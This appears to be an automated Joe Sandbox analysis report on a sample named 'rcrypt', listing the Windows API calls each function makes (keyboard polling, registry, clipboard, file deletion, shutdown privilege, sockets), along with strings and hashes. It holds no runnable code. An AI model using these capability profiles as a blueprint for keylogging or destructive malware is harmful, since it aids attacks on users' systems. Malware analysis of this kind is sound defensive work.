UCP), xrefs: 00141546
UTF16), xrefs: 00141508
CRLF), xrefs: 001416FA
NO_START_OPT), xrefs: 00141588
LIMIT_MATCH=, xrefs: 001415A9
NO_AUTO_POSSESS), xrefs: 00141567
ANY), xrefs: 00141717
BSR_ANYCRLF), xrefs: 00141757
LIMIT_RECURSION=, xrefs: 00141635
ANYCRLF), xrefs: 00141734
LF), xrefs: 001416DD
BSR_UNICODE), xrefs: 00141771
CR), xrefs: 001416C0

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: 2d1847a6ec383395064b66fd248f4245935bb19c99187f97e2b19aae5b4c9299
Instruction ID: 66f04176adb87344767e08d7c9dce53bd7f7c0e26159b20f3f3cf14e2c304800
Opcode Fuzzy Hash: 2d1847a6ec383395064b66fd248f4245935bb19c99187f97e2b19aae5b4c9299
Instruction Fuzzy Hash: 3D726175E002199BDF18CF58C8907EEB7B5FF58710F15816AE889EB290EB709D81CB90

Function 00170665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 001710A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00170038,?,?), ref: 001710BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00170737

Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 001707D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0017086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00170AAD
RegCloseKey.ADVAPI32(00000000), ref: 00170ABA

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 50e16e9dc5cbef3a817430711bcc50ae87052514e8b92d00a9ad9691c2aa68c5
Instruction ID: 99472a6e683d719cec33683658506d0a2ba96ab9cdb07aced9952cb87b1d0688
Opcode Fuzzy Hash: 50e16e9dc5cbef3a817430711bcc50ae87052514e8b92d00a9ad9691c2aa68c5
Instruction Fuzzy Hash: 33E13A71604314AFCB15DF28C881E6ABBF5EF89714F04856DF58ADB2A2DB30E941CB52

Function 00150219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00150241
GetAsyncKeyState.USER32(000000A0), ref: 001502C2
GetKeyState.USER32(000000A0), ref: 001502DD
GetAsyncKeyState.USER32(000000A1), ref: 001502F7
GetKeyState.USER32(000000A1), ref: 0015030C
GetAsyncKeyState.USER32(00000011), ref: 00150324
GetKeyState.USER32(00000011), ref: 00150336
GetAsyncKeyState.USER32(00000012), ref: 0015034E
GetKeyState.USER32(00000012), ref: 00150360
GetAsyncKeyState.USER32(0000005B), ref: 00150378
GetKeyState.USER32(0000005B), ref: 0015038A

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 9ff590bced1175061d1bb77e1ab3e7ad5f11f3096e0be127928d4bdf2c8eaa3a
Instruction ID: 12fc145a6b5b276578f250e12d960a7d46b43dbdca618fd92a61df2e4693725a
Opcode Fuzzy Hash: 9ff590bced1175061d1bb77e1ab3e7ad5f11f3096e0be127928d4bdf2c8eaa3a
Instruction Fuzzy Hash: AD4187249047C9EEFF725AE4C8083A6BAA07B19341F48409DDDD54E5C2DBD459CC8792

Function 00164458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0016447F
EmptyClipboard.USER32 ref: 00164485
GlobalAlloc.KERNEL32(00000002,?), ref: 0016449A
CloseClipboard.USER32 ref: 00164539

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 551f00697faf17acc856aff823cdf67c4e48cdfeb94e73bd8d6ea9655d1b641d
Instruction ID: 49e534521dde6ff85a674f46ec7290d21b4be844ed57afe8cc16dd69688c52bd
Opcode Fuzzy Hash: 551f00697faf17acc856aff823cdf67c4e48cdfeb94e73bd8d6ea9655d1b641d
Instruction Fuzzy Hash: 4E21AE352002109FDB11AF24EC09B6E77B8EF14710F10802AF90ADB6B2DB74AC92CB95

Function 00153A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000F48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000F48A1,?,?,000F37C0,?), ref: 000F48CE

Part of subcall function 00154CD3: GetFileAttributesW.KERNEL32(?,00153947), ref: 00154CD4

FindFirstFileW.KERNEL32(?,?), ref: 00153ADF
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00153B87
MoveFileW.KERNEL32(?,?), ref: 00153B9A
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00153BB7
FindNextFileW.KERNEL32(00000000,00000010), ref: 00153BD9
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00153BF5

Strings

\*.*, xrefs: 00153A8A, 00153A93, 00153AA8

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 62b6e835bcba79074db7a4682fc719a7a754920005f8a4d51bfbedfca1f487a6
Instruction ID: 9e31702770cd828d62bc616ae5187f5f02e507364b1c88d9c951ff468d982f0e
Opcode Fuzzy Hash: 62b6e835bcba79074db7a4682fc719a7a754920005f8a4d51bfbedfca1f487a6
Instruction Fuzzy Hash: 4251A23180524C9ACF05EBA0CD928FEB778AF14301F244169E9667B092DF316F4DDB61

Function 0015F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0015F6AB
Sleep.KERNEL32(0000000A), ref: 0015F6DB
_wcscmp.LIBCMT ref: 0015F6EF
_wcscmp.LIBCMT ref: 0015F70A
FindNextFileW.KERNEL32(?,?), ref: 0015F7A8
FindClose.KERNEL32(00000000), ref: 0015F7BE

Strings

*.*, xrefs: 0015F690

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: c5d111a4784595bf79985665242d4fd1a416790b449ecfcaf1076a25b7bcf528
Instruction ID: c416103b7939dfa91baef649e7e0fa40c99fdcb38e616d60a4d2aa890544b6f9
Opcode Fuzzy Hash: c5d111a4784595bf79985665242d4fd1a416790b449ecfcaf1076a25b7bcf528
Instruction Fuzzy Hash: F3416E7190020EDFCF15DF64CC45AEEBBB4FF09311F14456AE929A61A1EB309E89CB90

Function 00104140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON

Download Yara Rule

Strings

VUUU, xrefs: 001044DB
ERCP, xrefs: 0010421F
VUUU, xrefs: 00104520
VUUU, xrefs: 00137B0C
VUUU, xrefs: 001044ED

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: cc10015b09a6295f3ef9ed473c881d57098468d66e522c8cb88510bac4f49628
Instruction ID: 30324e52694974a9c66601a5413048b09e648ed7130d6e4c90d521b45f77908b
Opcode Fuzzy Hash: cc10015b09a6295f3ef9ed473c881d57098468d66e522c8cb88510bac4f49628
Instruction Fuzzy Hash: B4A27FB0E0421ACBDF38CF58C9907ADB7B1BB54314F1585AAE995A72C0E7B09E85CF50

Function 001058C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00105A05
_memmove.LIBCMT ref: 00105A55
_memmove.LIBCMT ref: 00105ABB

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: ca684253ae7d48a7ae09e54b8e695ae8d49ed0b01bcd764f6a2620e23216f18e
Instruction ID: 4f1eca1977d876fcb35431657487d9b1d6e3f0ce4135934b3a09c6886b6aa79b
Opcode Fuzzy Hash: ca684253ae7d48a7ae09e54b8e695ae8d49ed0b01bcd764f6a2620e23216f18e
Instruction Fuzzy Hash: 4C129C70A00609DFDF18DFA5D981AEEB7B6FF48300F108669E446E72A1EB35AD51CB50

Function 0015545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00148CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00148D0D
Part of subcall function 00148CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00148D3A
Part of subcall function 00148CC3: GetLastError.KERNEL32 ref: 00148D47

ExitWindowsEx.USER32(?,00000000), ref: 0015549B

Strings

@, xrefs: 0015548E
, xrefs: 00155489
SeShutdownPrivilege, xrefs: 0015546B

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 3e47aded13474642e46abb5582c5472f557ed494d6dd1132f9e75c6d002de015
Instruction ID: c666b8e9d3879808ad1aefda3fedb08c79731e32bd91b78f0ea00c8833c05ecc
Opcode Fuzzy Hash: 3e47aded13474642e46abb5582c5472f557ed494d6dd1132f9e75c6d002de015
Instruction Fuzzy Hash: 4101FC31655A11DAE72C5678DC6ABBB725AEB05353F240135FC26DE0D3FB905CC88190

Function 00166596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 001665EF
WSAGetLastError.WSOCK32(00000000), ref: 001665FE
bind.WSOCK32(00000000,?,00000010), ref: 0016661A
listen.WSOCK32(00000000,00000005), ref: 00166629
WSAGetLastError.WSOCK32(00000000), ref: 00166643
closesocket.WSOCK32(00000000,00000000), ref: 00166657

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 0dac52b1ebf0eaeacc2cd10c2a727b10017f01424af525475dfc7fe97ab6d888
Instruction ID: 1b7ed2489d0293ad687d4d8328144b2ca73f70d23d3efdee64519e12da7fa70e
Opcode Fuzzy Hash: 0dac52b1ebf0eaeacc2cd10c2a727b10017f01424af525475dfc7fe97ab6d888
Instruction Fuzzy Hash: 7D219E302002149FCB10AF24DC45B7EB7B9EF45320F158159E95AA72D2CB70AD91DB51

Function 00105680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00110FF6: std::exception::exception.LIBCMT ref: 0011102C
Part of subcall function 00110FF6: __CxxThrowException@8.LIBCMT ref: 00111041

_memmove.LIBCMT ref: 0014062F
_memmove.LIBCMT ref: 00140744
_memmove.LIBCMT ref: 001407EB

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: d5ce19c462ffd704a6076a662d865f0ada4c1e4657bced66f64c2844ac8d13fa
Instruction ID: 0ffc9ccf9abf63a97f07a5a7fc97dde6c36b81a5a69ee0696994c892dc0e4a20
Opcode Fuzzy Hash: d5ce19c462ffd704a6076a662d865f0ada4c1e4657bced66f64c2844ac8d13fa
Instruction Fuzzy Hash: FC02A070E00209DBCF09DF65D981ABEBBB5FF48300F158069E946DB2A5EB31D951CB91

Function 000F1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623

DefDlgProcW.USER32(?,?,?,?,?), ref: 000F19FA
GetSysColor.USER32(0000000F), ref: 000F1A4E
SetBkColor.GDI32(?,00000000), ref: 000F1A61

Part of subcall function 000F1290: DefDlgProcW.USER32(?,00000020,?), ref: 000F12D8

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 83d90d822ff562bbd6836dc68a0e1ad67c3a713c9d7a4aa1dc98f2cffe6800c4
Instruction ID: c1fc4c90e43d6e46c636618797f9bb744cb067c1ff726a25f8fc3fd8f2e084d5
Opcode Fuzzy Hash: 83d90d822ff562bbd6836dc68a0e1ad67c3a713c9d7a4aa1dc98f2cffe6800c4
Instruction Fuzzy Hash: 46A1797010955CFED638AB28AC94DFF36ACDB56341F144209F612D6D92CF258D61B2B3

Function 00166A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 001680A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001680CB

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00166AB1
WSAGetLastError.WSOCK32(00000000), ref: 00166ADA
bind.WSOCK32(00000000,?,00000010), ref: 00166B13
WSAGetLastError.WSOCK32(00000000), ref: 00166B20
closesocket.WSOCK32(00000000,00000000), ref: 00166B34

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 438e36b75f988569d85edcaa17f659a82a8b690087f54cd27567b6f7ee874702
Instruction ID: a1ce314cfc6d66657de78144aecb3d8103faff77e7baed5c47a81fded0983970
Opcode Fuzzy Hash: 438e36b75f988569d85edcaa17f659a82a8b690087f54cd27567b6f7ee874702
Instruction Fuzzy Hash: DD41C375700218AFEB14AF64DC86FBE77A89B44710F04805CFA1AAB7D3CB749D019B92

Function 001755FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 0017564C
IsWindowEnabled.USER32 ref: 0017565A
GetForegroundWindow.USER32(?,?,00000001), ref: 00175667
IsIconic.USER32 ref: 00175675
IsZoomed.USER32 ref: 00175683

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: cd0536fdcf45435a125d92fb3ad1fa9fee7ea3ba999bf8dbc3197d58cc6a1a75
Instruction ID: 6c326b4c3de27642ba9a498f876014a5cb80e748b2b188b188e9282966ffecfd
Opcode Fuzzy Hash: cd0536fdcf45435a125d92fb3ad1fa9fee7ea3ba999bf8dbc3197d58cc6a1a75
Instruction Fuzzy Hash: 3C11C4317009146FE7212F26DC44B6F7BBAEF44761B45842DF90ED7241CBB099828AA5

Function 0015C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0015C69D
CoCreateInstance.OLE32(00182D6C,00000000,00000001,00182BDC,?), ref: 0015C6B5

Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82

CoUninitialize.OLE32 ref: 0015C922

Strings

.lnk, xrefs: 0015C631, 0015C659, 0015C663

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 6a114d8f9bff04da812c0bd71bdeec26c2b2983957e8c26892064b4aefa46f99
Instruction ID: 122febf1743967b52dc6ab96eb5230df4a46cfe0184e174c33ce710976a650f4
Opcode Fuzzy Hash: 6a114d8f9bff04da812c0bd71bdeec26c2b2983957e8c26892064b4aefa46f99
Instruction Fuzzy Hash: 25A12C71108305AFD700EF54CC81EABB7E8EF94704F04496CF6569B1A2DB70EA49CB92

Function 0016C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00131D88,?), ref: 0016C312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0016C324

Strings

GetSystemWow64DirectoryW, xrefs: 0016C31E
kernel32.dll, xrefs: 0016C30D

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 2de2de14c0fa83ab7dfa66a0f7ff8ae18edba2e639403c7f91af1a0f296278db
Instruction ID: cba9927061bfc130e56767d87d9e3fd3042ddeb085f81fc827215b97ffc27a41
Opcode Fuzzy Hash: 2de2de14c0fa83ab7dfa66a0f7ff8ae18edba2e639403c7f91af1a0f296278db
Instruction Fuzzy Hash: C8E0EC74600713CFDB204B25DC44A5776E4FF09755F80C43DE899D2750E774D891CAA0

Function 00103190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 99d9613ecb2f321935f0cc44aea5bca6b749c2070d5642a7437e12e78e77ca3d
Instruction ID: 8df01e79749eccc8c42f2146b2d3881ef39c8c90ed93daa237ecb054bb223f38
Opcode Fuzzy Hash: 99d9613ecb2f321935f0cc44aea5bca6b749c2070d5642a7437e12e78e77ca3d
